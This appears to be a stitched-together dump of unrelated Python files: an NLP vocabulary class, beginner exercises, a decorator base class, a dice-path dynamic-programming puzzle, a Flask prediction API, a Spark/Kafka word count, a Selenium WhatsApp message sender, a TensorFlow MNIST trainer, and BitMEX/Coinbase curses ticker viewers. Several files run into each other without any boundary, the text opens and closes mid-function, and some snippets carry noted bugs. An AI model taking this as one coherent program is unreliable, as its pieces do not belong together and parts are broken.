        entry occupies two consecutive ids (_WHITE then _BLACK).
        """
        mapping = {}
        next_id = 1
        for entry in self._manifest['debug']['resourceMap']['media']:
            base_name = 'RESOURCE_ID_' + entry['defName']
            if entry['type'] == 'png-trans':
                mapping[base_name + '_WHITE'] = next_id
                next_id += 1
                mapping[base_name + '_BLACK'] = next_id
            else:
                mapping[base_name] = next_id
            next_id += 1
        return mapping

    def verify_data(self):
        """Delegate integrity checking to the resource pack."""
        return self.resources.verify_data()

    def get_file_id(self, def_name):
        """Return the file id for a full RESOURCE_ID_* name."""
        return self.resource_id_mapping[def_name]

    def get_chunk(self, file_id):
        """Return the raw resource chunk for *file_id*."""
        return self.resources.get_chunk(file_id)
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
import numpy as np
from tqdm import tqdm
from collections import Counter
import logging
class Vocab(object):
    """Bidirectional token <-> id vocabulary with frequency counts.

    Two special tokens are always present: '<PAD>' (id 0) and '<UNK>'
    (id 1); unknown tokens map to the '<UNK>' id on lookup.
    """

    def __init__(self):
        self.token2id = {}
        self.id2token = {}
        self.token_cnt = {}
        self.pad_token = '<PAD>'
        self.unk_token = '<UNK>'
        self.initial_tokens = [self.pad_token, self.unk_token]
        for token in self.initial_tokens:
            self.add(token)

    def add(self, token, cnt=1):
        """Add *token* to the vocab (id assigned on first sight) and bump
        its count by *cnt* (counts are untouched when cnt <= 0).

        :return: the token's id
        """
        if token not in self.token2id:
            new_id = len(self.id2token)
            self.id2token[new_id] = token
            self.token2id[token] = new_id
        if cnt > 0:
            self.token_cnt[token] = self.token_cnt.get(token, 0) + cnt
        return self.token2id[token]

    def size(self):
        """Number of distinct tokens (including the special tokens)."""
        return len(self.id2token)

    def get_id(self, token):
        """Id of *token*, or the '<UNK>' id when it is out of vocabulary."""
        return self.token2id.get(token, self.token2id[self.unk_token])

    def get_token(self, idx):
        """Token for *idx*, or the '<UNK>' token for unknown ids."""
        return self.id2token.get(idx, self.unk_token)

    def convert_to_ids(self, tokens):
        """Map a list of tokens to ids ('<UNK>' id for OOV tokens)."""
        return [self.get_id(token) for token in tokens]

    def recover_from_ids(self, ids, stop_id=None):
        """Map ids back to tokens, stopping after *stop_id* is emitted."""
        tokens = []
        for idx in ids:
            tokens.append(self.get_token(idx))
            if stop_id is not None and idx == stop_id:
                break
        return tokens

    def filter_tokens_by_cnt(self, min_cnt):
        """Drop tokens seen fewer than *min_cnt* times and reassign ids
        (special tokens are always kept, in front)."""
        kept = [t for t in self.token2id if self.token_cnt[t] >= min_cnt]
        # rebuild the token <-> id maps from scratch
        self.token2id = {}
        self.id2token = {}
        for token in self.initial_tokens:
            self.add(token, cnt=0)
        for token in kept:
            self.add(token, cnt=0)
from functools import reduce
# Exercise 1: sum the quiz grades with functools.reduce.
quiz_grades = [98, 94, 96, 97, 99, 97]
print(reduce(lambda total, element: total+element, quiz_grades))
# Exercise 2: read a comma-separated string and print its parts sorted.
user_string = input('String:').split(',')
sorted_string = sorted(user_string)
print(sorted_string)
def char_counter(string_to_count):
    """Return a dict mapping each character of *string_to_count* to the
    number of times it occurs."""
    counts = {}
    for character in string_to_count:
        counts[character] = counts.get(character, 0) + 1
    return counts
print(char_counter("how are you today?"))
# I couldn't figure out the last one
# Went over it in class
# The block below is an unused triple-quoted string (note the stray 4th
# quote at the start) kept as inert reference text of the instructor's
# solutions; it is never executed.
""""
Alex's way
#1 the first way
from functools import reduce
def list_sum(list_to_sum):
    return reduce(lambda total,next_element: total + next_element,list_to_sum)
my_list=[98, 94, 96, 97, 99, 97]
print(list_sum(my_list))
#1 a different way
def list_sum(list_to_sum):
    return sum(list_to_sum)
my_list=[98, 94, 96, 97, 99, 97]
print(sum(my_list))
def string_sorter(string_to_sort):
    string_to_list = string_to_sort.split(",")
    string_to_list.sort()
    return ",".join(string_to_list)
print(string_sorter("orange,banana,apple,lemon"))
def char_counter(string_to_count):
    char_counts = {}
    for char in string_to_count:
        if char in char_counts:
            char_counts[char] += 1
        else:
            char_counts[char] = 1
    return char_counts
print(char_counter("how are you today?"))
"""
import inspect
import re
import time
from abc import ABC, abstractmethod
from contextlib import suppress
from typing import Any, Callable, Union, List, Dict
import decorator
class JunitDecorator(ABC):
    """Abstract base for decorators that observe a function's execution.

    Subclasses customise behaviour through the lifecycle hooks
    ``_on_call``, ``_on_wrapper_start``, ``_on_exception`` and
    ``_on_wrapper_end``.
    """

    _func: Union[Callable, None]           # the decorated function
    _start_time: Union[float, None]        # wall-clock start of the last run
    _stack_locals: List[Dict[str, Any]]    # locals of each caller frame at start

    def __init__(self) -> None:
        self._func = None
        self._start_time = None
        self._stack_locals = list()

    def __call__(self, function: Callable) -> Callable:
        """
        :param function: Decorated function
        :return: Wrapped function
        """
        self._func = function
        self._on_call()

        def wrapper(_, *args, **kwargs):
            # decorator.decorator passes the original function as the first
            # argument; it is ignored here because it is captured already.
            return self._wrapper(function, *args, **kwargs)

        # decorator.decorator preserves the wrapped function's signature.
        return decorator.decorator(wrapper, function)

    def __str__(self) -> str:
        return f"{self.__class__.__name__} {self.name}"

    def __repr__(self) -> str:
        return f"{self.__class__.__name__} {self.name}"

    @property
    def name(self):
        # Name of the decorated function.
        return self._func.__name__

    def _wrapper(self, function: Callable, *args, **kwargs):
        # Run the wrapped function between the start/end hooks. Hook errors
        # are suppressed so they never mask the wrapped function's outcome;
        # _on_exception by default re-raises the original exception.
        value = None
        with suppress(BaseException):
            self._on_wrapper_start(function)
        try:
            value = self._execute_wrapped_function(*args, **kwargs)
        except BaseException as e:
            self._on_exception(e)
        finally:
            with suppress(BaseException):
                self._on_wrapper_end()
        return value

    def _get_class_name(self) -> str:
        """
        Get class name of which the decorated function contained in it.
        If class doesn't exists, it returns the module name
        :return: class or module name
        """
        module = inspect.getmodule(self._func)
        try:
            # Bound/qualified functions repr as "<Class.method at 0x...>".
            classname, _ = re.compile(r"(\w+)\.(\w+)\sat\s").findall(str(self._func))[0]
            return classname
        except IndexError:
            # Free function: fall back to the defining module's name.
            return inspect.getmodulename(inspect.getmodule(module).__file__)

    @abstractmethod
    def _on_wrapper_end(self) -> None:
        """
        Executed after execution finished (successfully or not)
        :return: None
        """

    def _on_call(self) -> None:
        """
        Executed on __call__ start.
        :return: None
        """

    def _execute_wrapped_function(self, *args, **kwargs) -> Any:
        """
        Execute wrapped function and return its value.
        Exceptions in this function will be caught by _on_exception
        :param args: Arguments passed to the function
        :param kwargs: Key arguments passed to the function
        :return: Wrapped function return value
        """
        return self._func(*args, **kwargs)

    def _on_exception(self, e: BaseException) -> None:
        """
        This function executed when exception is raised within the wrapped
        function. The default re-raises the active exception.
        :param e: Raised BaseException
        :return: None
        """
        raise

    def _on_wrapper_start(self, function) -> None:
        """
        This function executed when wrapper function starts: records the
        start time and a snapshot of every caller frame's locals.
        :return: None
        """
        self._start_time = time.time()
        self._stack_locals = [frame_info.frame.f_locals for frame_info in inspect.stack()]
|
#!/usr/bin/env python
# encoding: utf-8
import os
import numpy as np
import time
from configparser import RawConfigParser, NoSectionError
import matplotlib.ticker
import matplotlib.dates as mpd
class ExperimentConfigFile(RawConfigParser, matplotlib.ticker.Formatter):
    """Experiment config reader that doubles as a matplotlib tick
    formatter: formatting an axis value yields the name of the experiment
    phase (config section) covering that time, or 'Unknown'."""

    def __init__(self, path, fname=None):
        """Read *fname* from *path*; when fname is None use 'config.txt'
        or the first 'config*.txt' found in the directory."""
        RawConfigParser.__init__(self)
        self.path = path
        if fname is None:
            if os.path.isfile(os.path.join(path, 'config.txt')):
                self.fname = 'config.txt'
            else:
                # FIX: filter() returns an iterator on Python 3, so the
                # original ``filter(...)[0]`` raised TypeError.
                candidates = [x for x in os.listdir(path)
                              if x.startswith('config') and x.endswith('.txt')]
                self.fname = candidates[0]
        else:
            self.fname = fname
        self.read(os.path.join(path, self.fname))

    def gettime(self, sec):
        """Convert start and end time and date read from section sec
        (might be a list) of the config file to a tuple of times from
        epoch.

        Raises Exception when a date string is not
        DD.MM.YYYYHH:MM (15 chars) or DD.MM.YYYYHH:MM:SS (18 chars).
        """
        if isinstance(sec, list):
            # A list of sections spans from the earliest start to the
            # latest end among them.
            starts = []
            ends = []
            for ss in sec:
                st, et = self.gettime(ss)
                starts.append(st)
                ends.append(et)
            return min(starts), max(ends)
        else:
            tstr1 = self.get(sec, 'startdate') + self.get(sec, 'starttime')
            tstr2 = self.get(sec, 'enddate') + self.get(sec, 'endtime')
            if len(tstr1) == 15:
                t1 = time.strptime(tstr1, '%d.%m.%Y%H:%M')
            elif len(tstr1) == 18:
                t1 = time.strptime(tstr1, '%d.%m.%Y%H:%M:%S')
            else:
                raise Exception('Wrong date format in %s' % self.fname)
            if len(tstr2) == 15:
                t2 = time.strptime(tstr2, '%d.%m.%Y%H:%M')
            elif len(tstr2) == 18:
                t2 = time.strptime(tstr2, '%d.%m.%Y%H:%M:%S')
            else:
                raise Exception('Wrong date format in %s' % self.fname)
            return time.mktime(t1), time.mktime(t2)

    def __call__(self, x, pos=0):
        """Formatter protocol: map a matplotlib date value to the name of
        the section whose [start, end) interval contains it."""
        x = mpd.num2epoch(x)
        for sec in self.sections():
            t1, t2 = self.gettime(sec)
            if t1 <= x < t2:
                return sec
        return 'Unknown'
from typing import Tuple, List
class Dice:
    """A six-sided die tracked by its three visible faces.

    Opposite faces always sum to 7, so top/left/front determine the full
    orientation. ``cost`` accumulates the value of the face that lands on
    the bottom after each translation move (not after pure rotations).
    """

    def __init__(self, top, left, front, cost=0):
        self.top = top
        self.bottom = 7 - top
        self.left = left
        self.right = 7 - left
        self.front = front
        self.back = 7 - front
        self.cost = cost

    def __repr__(self):
        return f'Dice(top: {self.top}, left: {self.left}, front: {self.front}, cost: {self.cost})'

    @property
    def state(self):
        """The (top, left, front) triple identifying this orientation."""
        return self.top, self.left, self.front

    def move_down(self):
        """Roll one cell downward (left/right faces unchanged)."""
        previous_top = self.top
        previous_bottom = self.bottom
        self.top = self.back
        self.bottom = self.front
        self.front = previous_top
        self.back = previous_bottom
        self.cost += self.bottom
        return self

    def move_right(self):
        """Roll one cell to the right (front/back faces unchanged)."""
        previous_top = self.top
        previous_bottom = self.bottom
        self.top = self.left
        self.bottom = self.right
        self.left = previous_bottom
        self.right = previous_top
        self.cost += self.bottom
        return self

    def copy(self):
        """Independent copy with the same orientation and accumulated cost."""
        return Dice(self.top, self.left, self.front, self.cost)

    def rotate_clockwise(self):
        """Spin 90 degrees clockwise around the vertical axis (no cost)."""
        previous_left = self.left
        previous_right = self.right
        self.left = self.front
        self.right = self.back
        self.back = previous_left
        self.front = previous_right
        return self

    def rotate_counterclockwise(self):
        """Spin 90 degrees counterclockwise around the vertical axis (no cost)."""
        previous_left = self.left
        previous_right = self.right
        self.left = self.back
        self.right = self.front
        self.back = previous_right
        self.front = previous_left
        return self
class Solution:
    """Minimum-cost die rolling from cell A to cell B on a grid, where
    each roll onto a neighbouring cell costs the face ending on the
    bottom."""

    def findMinStepsForUnKnownState(self, A: Tuple[int, int], B: Tuple[int, int]):
        """Try candidate starting orientations and return the cheapest cost.

        NOTE(review): rotate_clockwise() mutates ``p`` in place, so the
        four findABSteps calls evaluate rotations 0, 1, 3, 2 of each base
        orientation -- all four headings are covered, but only by accident
        of the mutation order; confirm this is intended.
        """
        all_possible = [Dice(1, 2, 3), Dice(2, 6, 3), Dice(3, 5, 1), Dice(4, 6, 2), Dice(5, 4, 1), Dice(6, 4, 5)]
        res = []
        for p in all_possible:
            res.append(self.findABSteps(A, B, p))
            res.append(self.findABSteps(A, B, p.rotate_clockwise()))
            res.append(self.findABSteps(A, B, p.rotate_clockwise().rotate_clockwise()))
            res.append(self.findABSteps(A, B, p.rotate_counterclockwise()))
        return min(res)

    def findABSteps(self, A: Tuple[int, int], B: Tuple[int, int], dice_state):
        # if the dice is in a given state
        M, N, new_dice_state = self.rotate_dice_wisely(A, B, dice_state)
        return self.findLowestCostInMN(M, N, new_dice_state)

    def rotate_dice_wisely(self, A: Tuple[int, int], B: Tuple[int, int], dice_state: Dice):
        """Rotate a copy of the die so B lies down-right of A, returning
        the (row, col) distances and the rotated copy.

        NOTE(review): the last three comparisons are strict, so when A and
        B share exactly one coordinate (same row or same column, off the
        first branch) no branch matches and the method implicitly returns
        None, making findABSteps raise TypeError -- boundary conditions
        need loosening.
        """
        # B is same as A or B is in bottom-right direction: no need to rotate
        if A[0] <= B[0] and A[1] <= B[1]:
            return B[0] - A[0], B[1] - A[1], dice_state.copy()
        # B is in top-right, rotate clockwise
        if A[0] > B[0] and A[1] < B[1]:
            return A[0] - B[0], B[1] - A[1], dice_state.copy().rotate_clockwise()
        # B is in bottom-left,
        if A[0] < B[0] and A[1] > B[1]:
            return B[0] - A[0], A[1] - B[1], dice_state.copy().rotate_counterclockwise()
        # B is in top-left:
        if A[0] > B[0] and A[1] > B[1]:
            return A[0] - B[0], A[1] - B[1], dice_state.copy().rotate_clockwise().rotate_clockwise()

    def findLowestCostInMN(self, M: int, N: int, initial_dice: Dice):
        """Dynamic programming over an M x N grid of reachable die states;
        each cell keeps, per orientation, only the cheapest state.

        NOTE(review): when exactly one of M or N is 0 the dp table is
        empty along one axis and dp[-1][-1] raises IndexError -- only the
        (0, 0) case is guarded.
        """
        if M == 0 and N == 0:
            return 0
        dp: List[List[List[Dice]]] = [[None] * N for _ in range(M)]
        for i in range(M):
            for j in range(N):
                if i == 0 and j == 0:
                    dp[0][0] = [initial_dice]
                elif i == 0:
                    # first row: only rightward moves reach these cells
                    dp[0][j] = [x.copy().move_right() for x in dp[0][j-1]]
                elif j == 0:
                    # first column: only downward moves reach these cells
                    dp[i][0] = [x.copy().move_down() for x in dp[i-1][0]]
                else:
                    # top states move down + left states move right
                    tmp_all_states = [x.copy().move_down() for x in dp[i-1][j]] + [x.copy().move_right() for x in dp[i][j-1]]
                    unique_states = set(x.state for x in tmp_all_states)
                    filtered_states = []
                    # only keep a lowest cost state for all states in the same position state
                    for state in unique_states:
                        state_with_min_cost = min([s for s in tmp_all_states if s.state == state], key=lambda x: x.cost)
                        filtered_states.append(state_with_min_cost)
                    dp[i][j] = filtered_states
        # print('last state', dp[-1][-1])
        return min(x.cost for x in dp[-1][-1])
# Demo runs: one with a known starting orientation, one searching over
# all candidate orientations.
if __name__ == '__main__':
    # If the Dice state is given
    ans1 = Solution().findABSteps([2, 8], [3, 1], Dice(6, 2, 4))
    print(f'Answer for given state between [2, 8] and [3, 1] is {ans1}')
    # If the Dice state is not given
    ans2 = Solution().findMinStepsForUnKnownState([0, 0], [8, 8])
    print(f'Answer for unknown dice state is {ans2}')
|
from flask import Flask, jsonify, request
from sklearn.externals import joblib
from flask_cors import CORS
# for printing to console for testing
import sys
from helpers import create_df
from helpers import prep_df
from helpers import groupby_to_dict
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import LinearRegression
app = Flask(__name__)
# allowing CORS to make calls across local environment
CORS(app)
@app.route('/')
def welcome_page():
    """Health-check / landing route for the API root."""
    return "Hi! This is my little bike-share API!"
@app.route('/simulation', methods=['POST'])
def create_simulation():
    """Predict bike-share demand for the month given in the JSON body.

    Expects ``{"month": ...}``; responds with ``{"predictions": ...}``
    grouped by time of day and starting station.
    """
    req = request.get_json()
    print(req, file=sys.stderr)  # debug: log the incoming payload
    # creates a df of variables based on given month
    init_df = create_df()
    model_df = prep_df(init_df, req['month'])
    # run location model to find destination probabilities
    # NOTE(review): location_model/frequency_model are globals assigned in
    # the __main__ block below; under a WSGI server they are undefined.
    location_probs = location_model.predict_proba(model_df)
    # run frequency model to find how many bikes are rented in an hour
    frequency_probs = frequency_model.predict(model_df)
    # NOTE(review): the two variables below are never used afterwards.
    return_locations = location_probs.tolist()
    return_frequencies = frequency_probs.tolist()
    # construct one df with vars and predictions
    combined_df = init_df.copy()
    combined_df['count'] = frequency_probs
    # one probability column per starting station
    for i, station in enumerate(init_df['Starting Station ID'].unique()):
        combined_df[station] = location_probs[:, i]
    print(combined_df.columns, file=sys.stderr)
    # groupby to get path to predictions from the given variables
    grouped = combined_df.groupby(['Time_of_Day', 'Starting Station ID']).count()
    # convert to json, which is easier understood by client
    result = groupby_to_dict(grouped)
    return jsonify({'predictions': result})
if __name__ == '__main__':
    # loads pickled models; these globals exist only when the app is run
    # directly with "python <file>.py" (see NOTE in the route above)
    location_model = joblib.load('./models/location.p')
    frequency_model = joblib.load('./models/frequency.p')
    app.run(port=4000)
|
from functools import reduce
def transformar_lista(elemento) -> list:
    """Collapse an exam record into ``[patient_id, total]``.

    *elemento* is expected to look like ``[patient_id, (label, value),
    ...]``; the result pairs the id with the sum of all values.

    The original built the total with ``reduce`` and a default-argument
    lambda, which raised TypeError on a record with no measurements;
    ``sum`` handles that case (total 0) and is clearer.
    """
    return [elemento[0], sum(examen[1] for examen in elemento[1:])]
def informe(examenes_medicos: list) -> list:
    """Summarise every exam via transformar_lista, then append the total
    count of "EL_PCOVID" entries found across all exams."""
    resumen = [transformar_lista(examen) for examen in examenes_medicos]
    positivos = 0
    for examen in examenes_medicos:
        for prueba in examen[1:]:
            if prueba[0] == "EL_PCOVID":
                positivos += 1
    resumen.append(positivos)
    return resumen
# Spark Streaming word count: consume messages from the Kafka topic
# 'province' (via ZooKeeper), count words per 5-second micro-batch, and
# publish each batch's counts as JSON to the Kafka topic 'result'.
from pyspark.streaming.kafka import KafkaUtils
from pyspark import SparkContext
from pyspark.streaming import StreamingContext
import sys
import json
# Replace any pre-existing context so the app name below takes effect.
sc = SparkContext.getOrCreate()
sc.stop()
sc = SparkContext(appName = "PythonStreamingReciever")
ssc = StreamingContext(sc, 5)  # 5-second batch interval
kafkaStream = KafkaUtils.createStream(ssc, 'localhost:2181', 'spark-streaming', {'province':1})
# Each Kafka record is a (key, value) pair; keep only the message value.
lines = kafkaStream.map(lambda x:x[1])
counts = lines.flatMap(lambda line:line.split(" ")).map(lambda word:(word,1)).reduceByKey(lambda a,b:a+b)
counts.pprint()
from kafka import KafkaProducer
producer = KafkaProducer(bootstrap_servers = 'localhost:9092')
def process(rdd):
    # Serialise this batch's (word, count) pairs and forward to 'result'.
    print(rdd)
    message = json.dumps(rdd.map(lambda x:[str(x[0]),str(x[1])]).collect())
    producer.send('result', message.encode('utf-8'))
counts.foreachRDD(process)
ssc.start()
ssc.awaitTermination()
# WhatsApp Web automation demo: open web.whatsapp.com, let the user scan
# the QR code, open a chat by contact name and send six growing messages.
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from time import sleep
driver=webdriver.Chrome()
add='https://web.whatsapp.com/'
driver.get(add)
wait=WebDriverWait(driver, 60)
sleep(6)  # give the user time to scan the WhatsApp Web QR code
# The placeholder below must be replaced with a real contact name before use.
user=wait.until(EC.presence_of_element_located((By.XPATH,"//span[@title='{}']".format("//enter contact name here"))))
user.click()
for i in range(0,6,1):
    # NOTE(review): '_2A8P4' and the CSS selector below are obfuscated
    # WhatsApp class names; they break whenever the site updates.
    text=wait.until(EC.presence_of_element_located((By.CLASS_NAME,'_2A8P4')))
    text.send_keys("HIIIIIIIIIIII " *(i+1))
    send=wait.until(EC.presence_of_element_located((By.CSS_SELECTOR,'#main > footer > div.vR1LG._3wXwX.copyable-area > div:nth-child(3) > button > span')))
    send.click()
    sleep(0.5)
|
import win32gui
def list_window_names():
    """Print the handle (hex) and title of every visible top-level window."""
    def _print_visible(hwnd, _ctx):
        # Callback invoked by EnumWindows once per top-level window.
        if win32gui.IsWindowVisible(hwnd):
            print(hex(hwnd), win32gui.GetWindowText(hwnd))
    win32gui.EnumWindows(_print_visible, None)


list_window_names()
|
import numpy as np
import tensorflow as tf
import math
from dataset import MnistDataset
IMG_SIZE = 28
class CNNMnistLayer:
    """A stack of Conv2D(+ReLU) / 2x2-MaxPool blocks, one block per entry
    in *filters*; each pool halves the spatial resolution."""

    def __init__(self, filters: list, kernel_size: int = 3, name: str = None):
        # filters: output-channel count of each convolutional block.
        self.layers = []
        self.name = name
        for index, filter_count in enumerate(filters):
            self.layers.append(tf.compat.v1.layers.Conv2D(filters=filter_count,
                               kernel_size=kernel_size, name=f'conv2d_{index}',
                               input_shape=(IMG_SIZE, IMG_SIZE, 1),
                               padding='same',
                               activation=tf.nn.relu))
            self.layers.append(tf.compat.v1.layers.MaxPooling2D(pool_size=[2, 2], strides=2,
                               name=f'maxpool2d_{index}'))

    def __call__(self, input_tensor: tf.Tensor):
        """Apply the layers sequentially under this block's name scope and
        return the final output tensor."""
        with tf.name_scope(self.name):
            for layer in self.layers:
                output = layer(input_tensor)
                input_tensor = output
            return output
class Network:
    """Builds the MNIST classification graph (TF1 compat layers)."""

    def __init__(self):
        self.logits = None  # output tensor, populated by get_network()

    def get_network(self):
        """Construct the graph and return the output tensor.

        NOTE(review): the final Dense layer is named 'logits' but applies
        a softmax activation, so it actually outputs class probabilities,
        not logits.
        """
        X = tf.placeholder(tf.float32, shape=(None, IMG_SIZE, IMG_SIZE, 1), name='input')
        cnn_layers_0 = CNNMnistLayer([32, 64], kernel_size=3, name='cnn_layer_0')
        # batch_norm_layer = tf.layers.BatchNormalization()
        # cnn_layers_1 = CNNMnistLayer([64], kernel_size=3, name='cnn_layer_1')
        dense = tf.compat.v1.layers.Dense(1024, activation=tf.nn.relu)
        logits = tf.compat.v1.layers.Dense(10, activation=tf.nn.softmax, name='logits')
        mnist_nn = cnn_layers_0(X)
        # mnist_nn = cnn_layers_1(mnist_nn)
        # mnist_nn = tf.reshape(mnist_nn, [-1, 3 * 3 * 64])
        # 28x28 input halved by two pooling layers -> 7x7, 64 channels.
        mnist_nn = tf.reshape(mnist_nn, [-1, 7 * 7 * 64])
        mnist_nn = dense(mnist_nn)
        self.logits = logits(mnist_nn)
        return self.logits
class Train:
    """Mini-batch SGD training loop for the MNIST network (TF1 graph mode)."""

    def __init__(self, network: tf.Tensor):
        self.network = network       # output tensor produced by Network
        self.mnist = MnistDataset()  # project-local dataset wrapper
        self.loss = None

    def train(self):
        """Run SGD for a fixed number of epochs over fixed-size batches.

        NOTE(review): the loss op and optimizer are re-created inside the
        batch loop, so the graph grows on every iteration and each batch's
        labels are baked in as constants instead of being fed through a
        placeholder -- both should be built once before the session loop.
        """
        train_number = len(self.mnist.train_labels)
        batch_size = 1000
        batches_number = math.ceil(train_number / batch_size)
        epochs_number = 20
        with tf.Session() as sess:
            sess.run(tf.compat.v1.initializers.global_variables())
            # write the graph for TensorBoard inspection
            tf.summary.FileWriter('./tb_logs', sess.graph)
            # deal with epochs
            for n_epoch in range(epochs_number):
                # deal with batches
                for batch_number in range(batches_number):
                    # one-hot encode this batch's labels via np.eye
                    labels = np.eye(10)[self.mnist.train_labels[batch_number*batch_size:(batch_number+1)*batch_size]]
                    self.loss = tf.compat.v1.losses.mean_squared_error(labels, self.network)
                    optimizer = tf.train.GradientDescentOptimizer(0.01).minimize(self.loss)
                    images = self.mnist.train_images[batch_number*batch_size:(batch_number+1)*batch_size]
                    _, loss_val = sess.run([optimizer, self.loss], feed_dict={'input:0': images})
                    print(f'Epoch number: {n_epoch}, batch number: {batch_number}: loss: {loss_val}')
                print(f'Loss after epoch {n_epoch}: {loss_val}')
|
# Demo: send a urlencoded POST request to httpbin and print the echoed
# response body.
from urllib import request, parse

url = 'http://httpbin.org/post'
header = {
    'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
    'Host': 'httpbin.org'
}
# Renamed from ``dict``: shadowing the builtin made later code fragile.
form_fields = {
    'name': 'test'
}
data = bytes(parse.urlencode(form_fields), encoding='utf8')
req = request.Request(url=url, data=data, headers=header, method='POST')
res = request.urlopen(req)
print(res.read().decode('utf-8'))
from dao.abstractDAO import AbstractDAO
from entidades.aluno import Aluno
class AlunoDAO(AbstractDAO):
    """DAO for Aluno entities, persisted through AbstractDAO in
    'alunos.pkl'.

    Every method type-checks its arguments first; when a check fails the
    method silently returns None instead of raising.
    """

    def __init__(self) -> None:
        super().__init__('alunos.pkl')

    def get(self, key):
        # Only integer matricula keys are accepted.
        if isinstance(key, int):
            return super().get(key)

    def add(self, matricula, aluno):
        # Store only genuine Aluno instances keyed by an int matricula.
        if (aluno is not None) and (isinstance(aluno, Aluno) and (isinstance(matricula, int))):
            return super().add(matricula, aluno)

    def remove(self, key):
        if isinstance(key, int):
            return super().remove(key)

    def getAll(self):
        return super().getAll()
|
import turtle
import random

turtle.width(10)
turtle.speed(0)

# Draw an ever-growing spiral: each segment is 5 units longer than the
# previous one, turned 170 degrees, drawn in a randomly chosen colour.
palette = ["red", "blue", "cyan", "magenta", "gold", "gray", "black",
           "yellow", "orange", "green"]
length = 0
while True:
    turtle.color(random.choice(palette))
    length += 5
    turtle.forward(length)
    turtle.right(170)
|
class testClass(object):
    """Tiny demo class: a class-level `number` plus a per-instance `string`.

    The class-body print runs once, when the class object is created.
    (Modernized from Python 2 `print` statements, which do not compile
    under Python 3.)
    """
    print("Creating New Class\n==================")

    number = 5  # class attribute; assigning tc.number shadows it per instance

    def __init__(self, string):
        self.string = string

    def printClass(self):
        """Print the current number and string."""
        print("Number = %d" % self.number)
        print("String = %s" % self.string)
# Demo: build an instance, print it, mutate its attributes, print again.
demo = testClass("Five")
demo.printClass()
demo.number = 10  # shadows the class attribute on this instance only
demo.string = "Ten"
demo.printClass()
|
import math
import json
import yaml
import curses
import traceback
import websocket
from pprint import pprint
from websocket import create_connection
from termcolor import colored
BASEURL_SHITMEX = 'wss://www.bitmex.com/realtime'
BASEURL_COINBASE = 'wss://ws-feed.pro.coinbase.com'
def coinbase_sock_connect():
    """Subscribe to the Coinbase Pro BTC-USD ticker websocket feed and
    display the latest price/size in a curses window until 'q' is pressed.

    The curses screen is always torn down in the ``finally`` block so the
    terminal is restored even on error.
    """
    ws = create_connection(BASEURL_COINBASE)
    ws.send(json.dumps({
        "type": "subscribe",
        "product_ids": ["BTC-USD"],
        "channels": [
            "ticker",
            {"name": "ticker", "product_ids": ["BTC-USD"]},
        ]
    }))
    win1 = None  # predefine so the finally block is safe if initscr() fails
    try:
        stdscr = curses.initscr()
        curses.noecho()
        curses.cbreak()
        win1 = curses.newwin(30, 30, 0, 0)
        win1.border()
        while True:
            response = ws.recv()
            if 'subscriptions' in response:
                continue  # skip the subscription acknowledgement message
            # Parse the JSON payload once. The original parsed the same
            # message three times via yaml.safe_load; the feed is plain JSON.
            msg = json.loads(response)
            size = msg['last_size']
            price = msg['price']
            # Original used addnstr(..., curses.A_BOLD), which passes A_BOLD
            # as the length argument `n`, so the bold attribute never applied.
            win1.addstr(1, 2, price + ' ' + size, curses.A_BOLD)
            win1.refresh()
            ch = win1.getch()  # blocking: waits for a key per message
            if ch == ord('q'):
                break
            win1.clrtoeol()
            win1.refresh()
    except Exception:
        # Original called traceback.print_exec(), which does not exist;
        # the correct function is print_exc().
        traceback.print_exc()
    finally:
        if win1 is not None:
            win1.keypad(0)
        curses.echo()
        curses.nocbreak()
        curses.endwin()
def shitmex_sock_connect():
    """Subscribe to the BitMEX XBTUSD trade websocket feed and display each
    trade's price/size in a curses window until 'q' is pressed."""
    ws = create_connection(BASEURL_SHITMEX)
    ws.send(json.dumps({"op": "subscribe", "args": ["trade:XBTUSD"]}))
    # Drain messages until the initial "partial" snapshot arrives, which
    # marks the start of the live stream.
    while True:
        response = ws.recv()
        if 'action' in response and json.loads(response)['action'] == "partial":
            print("Exiting the while loop, because \"action\":\"partial\"")
            break
    win1 = None  # predefine so the finally block is safe if initscr() fails
    try:
        stdscr = curses.initscr()
        curses.noecho()
        curses.cbreak()
        win1 = curses.newwin(30, 30, 0, 0)
        win1.border()
        while True:
            response = ws.recv()
            if 'data' in response:
                # Parse once (the feed is JSON; the original re-parsed the
                # same message via yaml.safe_load per field).
                trade = json.loads(response)['data'][0]
                price = trade['price']
                size = trade['size']
                # addnstr(..., A_BOLD) passed A_BOLD as the length `n`
                # argument; addstr applies it as an attribute as intended.
                win1.addstr(1, 2, str(price) + ' ' + str(size), curses.A_BOLD)
            # Single blocking read for the quit key. The original called
            # getch() twice per message (once on win1, once on stdscr),
            # requiring two key presses for every update.
            ch = win1.getch()
            win1.clrtoeol()
            if ch == ord('q'):
                break
            win1.refresh()
    except Exception:
        # Original: traceback.print_exec() — that function does not exist.
        traceback.print_exc()
    finally:
        if win1 is not None:
            win1.keypad(0)
        curses.echo()
        curses.nocbreak()
        curses.endwin()
def main():
    """Entry point: stream BitMEX trades in a curses window.

    Swap the commented call below to watch the Coinbase feed instead.
    """
    shitmex_sock_connect()
    # coinbase_sock_connect()
if __name__ == "__main__":
    main()
'''
if 'l2update' in response:
side = yaml.safe_load(response)['changes'][0][0]
price = yaml.safe_load(response)['changes'][0][1]
size = yaml.safe_load(response)['changes'][0][2]
if side == 'buy':
colour = 'green'
else:
colour = 'red'
print("{:20} {:20}".format(colored(price, colour), colored(size, colour)))
{
"type": "ticker",
"sequence": 10878578482,
"product_id": "BTC-USD",
"price": "9819.99",
"open_24h": "9986.55000000",
"volume_24h": "9451.26364659",
"low_24h": "9665.39000000",
"high_24h": "10077.11000000",
"volume_30d": "258888.13877306",
"best_bid": "9819.98",
"best_ask": "9819.99",
"side": "buy",
"time": "2019-09-23T18:39:41.195000Z",
"trade_id": 74476314,
"last_size": "0.01996233"
}
'''
|
#!/usr/bin/env python
#_*_coding:utf-8_*_
import re
import numpy as np
from sklearn.model_selection import StratifiedKFold
import tensorflow as tf
from tensorflow import keras
from tensorflow.python.keras.callbacks import EarlyStopping
def Second_Model_DNN_One_HOT(blend_train_data,blend_train_label,blend_test_data,blend_test_label,second_test_data):
    """Train a fully-connected binary classifier on the blend-train split.

    Returns sigmoid probabilities for the blend-test split and for the
